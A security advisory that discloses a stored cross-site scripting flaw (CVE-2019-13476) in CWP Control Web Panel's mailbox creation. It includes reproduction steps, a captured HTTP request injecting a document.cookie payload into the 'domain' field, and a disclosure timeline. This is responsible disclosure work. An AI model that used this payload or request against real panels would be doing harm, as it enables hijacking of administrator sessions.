# ==================================================================== # Information # ==================================================================== Product : CWP Control Web Panel version : 0.9.8.837 Fixed on : 0.9.8.851 Test on : CentOS 7.6.1810 (Core) Reference : https://control-webpanel.com/ CVE-Number : 2019-13476 # ==================================================================== # Description # ==================================================================== Cross Site Scripting (Stored) User add "New Mailbox" with payload XSS without validation # ==================================================================== # Steps to Reproduce # ==================================================================== 1. In user panel click at "Email Account" under the Email Accounts and click it again 2. Add a "New Mailbox" 3. Use BurpSuite for Intercept request then modified parameter "domain" to payloads XSS ('-confirm(document.cookie)-'@blahblah.com) 4. We can added email success the parameter "domain" without input validate 5. In the List of mailbox user it's not exist after add email with xss payload, but in the admin panel added success 6. In the panel admin Click Email --> Email Accounts we can see the xss payload 7. Click any the button such as Change Password, Suspend, Delete XSS payload will be Executed POST /cwp_df6968dca257be58/test/test/index.php?module=email_accounts&acc=addemail HTTP/1.1 Host: 172.16.10.141:2083 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 csrftoken: d6209a4f4bd1bf71b6987849c240bfa1 X-Requested-With: XMLHttpRequest Content-Length: 48 Connection: close Referer: https://172.16.10.141:2083/cwp_df6968dca257be58/test/?module=email_accounts Cookie: cwpsrv-bcb237cdd1001e9602820eb23df41980=jemq3j57diag45omlam2ffkkl5; cwpsrv-User-bcb237cdd1001e9602820eb23df41980=d3m5mauq3rl87m4nnpsfdhhr66; CWP-User=%7B%22user%22%3A%22test%22%2C%22date%22%3A%2219-08-20+09%3A28%3A26%22%2C%22token%22%3A%224003752352ba866c06a4e32dbcc7b9df6471613b%22%2C%22tokenuser%22%3A%225c434cc8bd14b6b500dccaae8b35389e%3AhtBkFA%3D%3D%22%2C%22timer%22%3A%2237f00cb4e1f28dc383d3ac9364129600%22%2C%22pwd%22%3A%22s%2BsKQWei%5Cn%22%7D email=test&domain='-confirm(document.cookie)-'@blahblah.com&pass=3937a279"amail=0 # ==================================================================== # PoC # ==================================================================== https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-13476.md # ==================================================================== # Timeline # ==================================================================== 2019-06-05: Discovered the bug 2019-06-05: Reported to vendor 2019-06-05: Vender accepted the vulnerability 2019-07-17: The vulnerability has been fixed 2019-08-20: Published # ==================================================================== # Discovered by # ==================================================================== Pongtorn Angsuchotmetee Nissana Sirijirakal Narin Boonwasanarak